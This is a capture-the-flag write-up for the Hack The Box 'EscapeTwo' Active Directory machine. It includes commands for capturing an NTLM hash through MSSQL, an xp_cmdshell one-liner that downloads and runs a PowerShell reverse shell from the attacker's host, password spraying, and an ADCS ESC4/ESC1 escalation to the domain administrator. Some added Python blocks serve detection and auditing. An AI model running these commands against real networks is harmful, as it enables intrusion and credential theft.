# HTB - EscapeTwo

<figure><img src="/files/NCuWk0fCqtPf6T6RlToa" alt=""><figcaption></figcaption></figure>

## Enumeration

***

**Nmap Scan**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -F -Pn $ip -oN Nmap/fast-scan

PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nmap -p53,88,135,139,389,445,464,593,636,1433,3268,3269,5985 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-13 20:09:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-13T19:33:09
|_Not valid after:  2055-01-13T19:33:09
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-13T20:10:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```

**Summary**

```r
* Open ports: 53-88-135-139-389-445-464-593-636-1433-3268-3269-5985
* UDP open ports: 
* Services: DNS - KERBEROS - LDAP - SMB - MSSQL - winRM - LDAPS
* Important notes: Domain: sequel.htb - DNS:DC01.sequel.htb - Microsoft SQL Server 2019
```

**hosts file**

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $sudo sh -c "echo  '$ip DC01 sequel.htb DC01.sequel.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $tail -n 1 /etc/hosts
10.10.11.51 DC01 sequel.htb DC01.sequel.htb
```

## Foothold

***

> As is common in real life Windows pentests, you will start this box with credentials for the following account: rose / KxEPkKe6R8su

With the provided credentials, I will try to connect to the exposed services (SMB, MSSQL, LDAP, etc.).

**MSSQL**

```bash
(impacket) ┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $mssqlclient.py sequel.htb/rose:KxEPkKe6R8su@dc01 -windows-auth

SQL (SEQUEL\rose  guest@master)>
```

I tried to steal NTLMv2 credentials using the `xp_dirtree` procedure, with an `SMBServer` running on my attacking machine. I got the hash but couldn't crack it, so I decided to look for other things.

```bash
# In the MSSQL session (as rose): make the SQL Server service account reach out to my share
xp_dirtree \\10.10.16.75\file.txt
# On the attacking machine: serve the share and capture the NTLMv2 authentication attempt
sudo impacket-smbserver -smb2support share $(pwd)
```

<figure><img src="/files/lXn4xOlANr3igINx4cOa" alt=""><figcaption></figcaption></figure>

I then moved on to dumping LDAP data and enumerating the domain with `bloodhound.py`.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ldapdomaindump ldap://$ip -u "sequel.htb\rose" -p 'KxEPkKe6R8su'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $bloodhound-python -u rose -p KxEPkKe6R8su -ns $ip -d sequel.htb -c all --zip
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
```

I also looked for kerberoastable accounts and found two, but I couldn't crack their hashes either.

<figure><img src="/files/cgFZYwpYnC4oXmpSaygs" alt=""><figcaption></figcaption></figure>

It's worth checking whether ADCS is present, as it opens many avenues for finding misconfigurations in the certificate templates.

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $nxc ldap 10.10.11.51 -u rose -p 'KxEPkKe6R8su' -M adcs
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.51     389    DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 
ADCS        10.10.11.51     389    DC01             [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        10.10.11.51     389    DC01             Found PKI Enrollment Server: DC01.sequel.htb
ADCS        10.10.11.51     389    DC01             Found CN: sequel-DC01-CA
```

I looked for `SMB shares` using my credentials and found I have access to two shared folders:

<figure><img src="/files/onC8Cb1ktMlQ6JCBAELk" alt=""><figcaption></figcaption></figure>

In `Accounting Department`, there is an `accounts.xlsx` file. First, I tried to open it with `Microsoft Excel` and other `xlsx` viewers, but they reported the file as corrupted.

Since an `xlsx` file is just a `zip` archive, I unzipped it and looked through its parts for interesting information.

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $ls
accounting_2024.xlsx  accounts.xlsx

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo/xlsx]
└──╼ $unzip accounts.xlsx 
Archive:  accounts.xlsx

  inflating: xl/workbook.xml         
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/sharedStrings.xml    
  inflating: _rels/.rels             
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: docProps/custom.xml     
  inflating: [Content_Types].xml  
```

Inside `xl/sharedStrings.xml`, there are several credentials:

```r
Angela:0fwz7Q4mxxxxxx
0scar:86LxLBMxxxxxxx
kevin:Md9Wlq1xxxxxxxxx
sa:MSSQLP@xxxxxxx
```
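The same recovery in code, as an added example that is not part of the writeup: it opens an `xlsx` as a zip, pulls every shared string out of `xl/sharedStrings.xml` (rich-text runs included) without needing the rest of the workbook, and flags cells that look like `user:password` pairs, the kind of check a defender can run over a file share. The sample workbook and its values are constructed here, not the box's real file.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML SpreadsheetML namespace used by xl/sharedStrings.xml
NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}
# Heuristic for a "user:password"-style cell, the shape seen in the writeup's sharedStrings.xml
CRED_RE = re.compile(r"^[A-Za-z0-9_.\-]{2,32}:[^\s:]{6,}$")


def shared_strings(xlsx_bytes: bytes) -> list:
    """Return every shared string in the workbook. Only the sharedStrings part is read,
    so a workbook Excel refuses to open still yields its strings."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    out = []
    for si in root.findall("m:si", NS):
        # a cell string is either one <t> or several rich-text <r><t> runs; join them
        out.append("".join(t.text or "" for t in si.iter(f"{{{NS['m']}}}t")))
    return out


def credential_like(strings: list) -> list:
    return [s for s in strings if CRED_RE.match(s)]


def build_sample_xlsx() -> bytes:
    """Constructed sample: a minimal zip carrying only sharedStrings.xml, with made-up values."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">'
        "<si><t>Employee</t></si>"
        "<si><r><t>sa</t></r><r><t>:P@ssw0rd-sample</t></r></si>"
        "<si><t>kevin:Example123456</t></si>"
        "<si><t>Q4 budget</t></si>"
        "</sst>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/sharedStrings.xml", xml)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in credential_like(shared_strings(build_sample_xlsx())):
        print("possible credential:", hit)
```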

## Lateral Movement

***

Using the `sa` account, I can log in to the MSSQL instance as an administrator.

<figure><img src="/files/g2GHgkqRwy1kM31Bdh9p" alt=""><figcaption></figcaption></figure>

Impacket version `v0.12.0` has built-in commands that automate some attacks; I will use `enable_xp_cmdshell`.

```bash
SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.

SQL (sa  dbo@master)> xp_cmdshell whoami
output           
--------------   
sequel\sql_svc
```
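The `Configuration option ... changed from X to Y` lines above are the same messages SQL Server writes to its ERRORLOG when `sp_configure` runs, which makes them a cheap detection point. As an added example (not part of the writeup), a parser for those lines that flags enablement of command-execution options; the ERRORLOG excerpt is constructed for the example, with the last two lines mirroring what `enable_xp_cmdshell` printed here.

```python
import re
from dataclasses import dataclass

# SQL Server ERRORLOG line: timestamp, source column (spidNN / Logon / Server), message
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<src>\S+)\s+(?P<msg>.*)$")
# Message emitted by sp_configure, as seen in the writeup's enable_xp_cmdshell output
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\.")
# Options whose enablement hands a SQL login OS-level execution or similar reach
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "clr enabled", "Ad Hoc Distributed Queries"}


@dataclass
class ConfigChange:
    ts: str
    spid: str
    option: str
    old: int
    new: int


def parse_config_changes(log_lines):
    changes = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        c = CONFIG_RE.search(m["msg"])
        if c:
            changes.append(ConfigChange(m["ts"], m["src"], c["opt"], int(c["old"]), int(c["new"])))
    return changes


def suspicious_enables(log_lines):
    """Watched options set to 1, including '1 to 1' re-runs: a tool re-enabling an option that
    is already on (as impacket did here) is still a strong signal worth alerting on."""
    return [c for c in parse_config_changes(log_lines) if c.option in WATCHED and c.new == 1]


# Constructed sample ERRORLOG excerpt (not taken from the box)
SAMPLE_LOG = """\
2025-01-13 20:14:58.41 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.16.84]
2025-01-13 20:15:02.12 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-13 20:15:02.13 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-13 20:15:30.00 spid55      Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
2025-01-13 20:15:30.01 spid55      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
""".splitlines()

if __name__ == "__main__":
    for c in suspicious_enables(SAMPLE_LOG):
        print(f"{c.ts} {c.spid}: '{c.option}' {c.old}->{c.new}")
```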

I will host a PowerShell reverse shell on my web server and download it to the machine.

To generate a reverse shell:

```bash
python3 /opt/PowerJoker/PowerJoker.py -l 10.10.16.84 -p 1337
```

Download and execute the shell:

```powershell
SQL (sa  dbo@master)> xp_cmdshell powershell -c iwr http://10.10.16.84/shell.ps1 -o C:\programdata\rev.ps1
SQL (sa  dbo@master)> xp_cmdshell powershell -c C:\programdata\rev.ps1
```

Receive the connection:

```powershell
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $rlwrap -cAr nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.84] from (UNKNOWN) [10.10.11.51] 54422

JokerShell C:\Windows\system32>
```

Under `C:\`, there is a `SQL2019` folder:

```bash
JokerShell C:\> ls
    Directory: C:\
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        11/5/2022  12:03 PM                PerfLogs
d-r---         1/4/2025   7:11 AM                Program Files
d-----         6/9/2024   8:37 AM                Program Files (x86)
d-----         6/8/2024   3:07 PM                SQL2019
d-r---         6/9/2024   6:42 AM                Users
d-----         1/4/2025   8:10 AM                Windows
```

I found the SQL Server setup configuration file; let's see its content.

<figure><img src="/files/ys69gT20oT3uIEjQ6IE5" alt=""><figcaption></figcaption></figure>

It contains the credentials of `sql_svc`, the account my shell is running as:

```powershell
JokerShell C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI

..snip..
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6Cxxxxxxxxx"
```

With that password, I will spray the other domain users:

<figure><img src="/files/X1C1RGahHV3go9caCW9j" alt=""><figcaption></figcaption></figure>

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6xxxxxxxxxx'

*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
87443ae9f1bdec35xxxxxxxxxxxxxxxx
```

> User Flag: 87443ae9f1bdec35xxxxxxxxxxxxxxxx

## Privilege Escalation

***

I will use `powerview.py` to manually enumerate the user's privileges.

```bash
(powerview.py) ┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $python3 /opt/powerview.py/powerview.py sequel.htb/ryan:'WqSZAF6Cyzzzzzzzz'@10.10.11.51

(LDAPS)-[DC01.sequel.htb]-[SEQUEL\ryan]
PV > Get-DomainUser -Identity ryan -Select ObjectSid
S-1-5-21-548670397-972687484-3496335370-1114
```

`ryan` has `WriteOwner` on `ca_svc`:

<figure><img src="/files/fYvKlyMIzdn7RoGwQlln" alt=""><figcaption></figcaption></figure>

With this privilege, I will make `ryan` the owner of `ca_svc`, then grant him `FullControl`; after that I can perform `Shadow Credentials`, a password reset, or targeted Kerberoasting.

```powershell
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontrol
```

Get the NT hash of `ca_svc` using the shadow credentials attack:

<figure><img src="/files/RFQqETsSexZZKRvkTYGH" alt=""><figcaption></figcaption></figure>

With the `ca_svc` hash, I can authenticate to the domain and enumerate `ADCS`:

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $certipy find -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508xxxxxxxxxxx -stdout -vulnerable

    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA

..snip..

[!] Vulnerabilities
ESC4     : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
```

So there is a template vulnerable to `ESC4`: I have permission to modify that template's attributes, which lets me make it vulnerable to `ESC1`.

> `ESC1` is an escalation path through a misconfigured template that lets the enrollee supply the `subject alternative name`; it can be abused to request a certificate for any domain user (such as Administrator) and authenticate as them.

```bash
certipy req -u 'ca_svc@sequel.htb' -hashes :3b181b914e7a9d5xxxxxxxxxxxxx7fce -ca sequel-DC01-CA -template 'DunderMifflinAuthentication' -upn Administrator@sequel.htb
```
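The ESC4-to-ESC1 step works because ESC1 is a conjunction of template settings, and flipping any one of them closes the path. As an added example (not from the writeup or from certipy), a small audit function that evaluates the published ESC1 preconditions against a template's attributes; the flag values for `DunderMifflinAuthentication` are constructed, since the writeup does not print them, and the second template shows the single change that makes the same template safe.

```python
from dataclasses import dataclass, field

# Bits of msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag (MS-CRTD)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002  # requires CA certificate manager approval
# EKU OIDs that allow a certificate to be used for domain authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}


@dataclass
class Template:
    name: str
    name_flag: int                          # msPKI-Certificate-Name-Flag
    enrollment_flag: int                    # msPKI-Enrollment-Flag
    ra_signatures: int                      # msPKI-RA-Signature
    ekus: set = field(default_factory=set)  # pKIExtendedKeyUsage; empty = no EKU restriction
    low_priv_enroll: bool = False           # Domain Users / Authenticated Users hold Enroll


def esc1_conditions(t: Template) -> dict:
    """Each ESC1 precondition and whether this template satisfies it."""
    return {
        "enrollee_supplies_subject": bool(t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "auth_eku": not t.ekus or bool(t.ekus & AUTH_EKUS),
        "no_manager_approval": not (t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS),
        "no_ra_signature": t.ra_signatures == 0,
        "low_priv_can_enroll": t.low_priv_enroll,
    }


def is_esc1(t: Template) -> bool:
    # every precondition must hold; breaking any single one closes the path
    return all(esc1_conditions(t).values())


def open_conditions(t: Template) -> list:
    return [k for k, v in esc1_conditions(t).items() if v]


# Constructed attribute values: the template as an ESC4 holder could leave it
ABUSED = Template("DunderMifflinAuthentication", CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0, 0,
                  {"1.3.6.1.5.5.7.3.2"}, low_priv_enroll=True)
# Same template after the fix: the CA builds the subject from AD, so the SAN cannot be chosen
HARDENED = Template("DunderMifflinAuthentication", 0, 0, 0,
                    {"1.3.6.1.5.5.7.3.2"}, low_priv_enroll=True)

if __name__ == "__main__":
    for t in (ABUSED, HARDENED):
        print(t.name, "ESC1" if is_esc1(t) else "not ESC1", open_conditions(t))
```

Requiring manager approval or an RA signature on the template closes the path just as well, which the checks above also reflect.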

Get the administrator hash:

```bash
┌─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $ certipy auth -pfx administrator.pfx -username Administrator -domain sequel.htb

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed40xxxxxxxxxxxx
```

```bash
┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/EscapeTwo]
└──╼ $evil-winrm -i 10.10.11.51 -u administrator -H 7a8d4e04986afa8ed40xxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
```

> Root Flag: eff768f0b89d396c3xxxxxxxxxxxxxxxxxx
